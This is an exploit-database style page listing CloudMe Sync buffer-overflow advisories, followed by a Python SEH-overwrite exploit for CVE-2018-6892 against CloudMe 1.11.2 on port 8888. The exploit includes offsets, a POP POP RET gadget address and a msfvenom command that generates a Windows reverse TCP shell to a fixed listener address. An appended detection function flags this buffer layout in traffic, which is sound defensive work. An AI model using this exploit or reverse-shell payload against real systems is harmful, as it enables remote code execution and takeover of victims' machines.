| Title | Published | Views | Reporter |
|---|---|---|---|
| CloudMe Sync 1.10.9 Remote Buffer Overflow Vulnerability | 12 Feb 2018 00:00 | – | zdt |
| CloudMe Sync 1.10.9 Buffer Overflow Exploit | 23 Feb 2018 00:00 | – | zdt |
| CloudMe Sync 1.9.2 Remote Buffer Overflow Exploit | 6 Mar 2018 00:00 | – | zdt |
| Cloudme 1.9 - Buffer Overflow (DEP) Exploit | 14 Aug 2018 00:00 | – | zdt |
| CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt Exploit | 22 Jan 2019 00:00 | – | zdt |
| CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Exploit | 28 Jan 2019 00:00 | – | zdt |
| CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) Exploit (2) | 29 Sep 2020 00:00 | – | zdt |
| CVE-2018-6892 | 13 Feb 2018 00:00 | – | circl |
| CloudMe Buffer Overflow Vulnerability | 12 Feb 2018 00:00 | – | cnvd |
| CloudMe Sync Buffer Overflow (CVE-2018-6892) | 2 Aug 2020 00:00 | – | checkpoint_advisories |

import socket
import sys
target = "127.0.0.1"
#Written by : lutzenfried (Clement Cruchet)
#Exploiting CloudMe 1.11.2 (Publisher : CloudMe AB)
#Windows x64 10.0.18362 Build 18362
#Buffer overflow using the SEH overwrite technique (POP POP RET)
#Exploit for CVE-2018-6892
#Technical information used for exploit development
#Register EIP is overwritten with pattern at position 1052 in thread 1676
#SEH register is overwritten with pattern at position 2344 in thread 1676
#Bad characters : \x00\x0A\x0D
#0x61f2ba2e | pop edi, pop ebp, ret | False | False | False | False | False | C:\Users\user1\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll
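buf = b"\x41" * 2344 #Filler up to the SEH record (offset 2344, see above)
seh = b"\xEB\x08\x90\x90" #Despite the name, this fills the nSEH field: short JMP over the handler address
nseh = b"\x2e\xba\xf2\x61" #Despite the name, this fills the SEH handler field: POP POP RET at 0x61f2ba2e (little-endian)
nopsled = b"\x90"*20 #NOP sled leading into the payload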
#msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.0.112 LPORT=4545 -b '\x00\x0A\x0D' -f python
payload = b""
run = buf + seh + nseh + nopsled + payload
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(run)
except Exception as e:
    print(e)
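
A detection-side view of the buffer layout built above, as an added example that is not part of the original exploit: it checks a captured TCP message (for instance one sent to the port 8888 the script connects to) for a long single-byte filler followed by an `EB xx 90 90` nSEH record and a handler pointer. The function name, the 1 KiB filler threshold and both sample messages are assumptions made for this sketch.

```python
import re
import struct

# Values taken from the exploit's own comments on this page.
SEH_OFFSET = 2344              # filler length before the SEH record
BAD_CHARS = b"\x00\x0a\x0d"    # bytes the exploit has to avoid

# Assumption: treat any single-byte run of 1 KiB or more as filler,
# since the exact offset differs between builds.
FILLER = re.compile(rb"(.)\1{1023,}", re.DOTALL)
# nSEH as written by the exploit: short forward jump padded with two NOPs.
NSEH_JMP = re.compile(rb"\xeb[\x01-\x7f]\x90\x90")


def find_seh_overwrite(data):
    """Return a dict describing an SEH-overwrite layout in data, or None."""
    m = FILLER.search(data)
    if m is None:
        return None
    record = data[m.end():m.end() + 8]   # nSEH (4 bytes) + handler pointer (4 bytes)
    if len(record) < 8 or not NSEH_JMP.match(record):
        return None
    (handler,) = struct.unpack("<I", record[4:])
    return {
        "filler_byte": m.group(1),
        "filler_len": m.end() - m.start(),
        "matches_page_offset": m.end() == SEH_OFFSET,
        "handler": hex(handler),
        # A handler address usable by this exploit contains none of the bad characters.
        "handler_avoids_bad_chars": not any(b in BAD_CHARS for b in record[4:]),
        "nop_sled": data[m.end() + 8:].startswith(b"\x90" * 8),
    }


# Constructed samples: the first mirrors the layout above with a placeholder
# handler address and INT3 bytes standing in for the payload.
SAMPLE = (b"A" * SEH_OFFSET + b"\xeb\x08\x90\x90"
          + struct.pack("<I", 0x11223344) + b"\x90" * 20 + b"\xcc" * 16)
BENIGN = b"constructed benign message " * 100

if __name__ == "__main__":
    print(find_seh_overwrite(SAMPLE))
    print(find_seh_overwrite(BENIGN))
```
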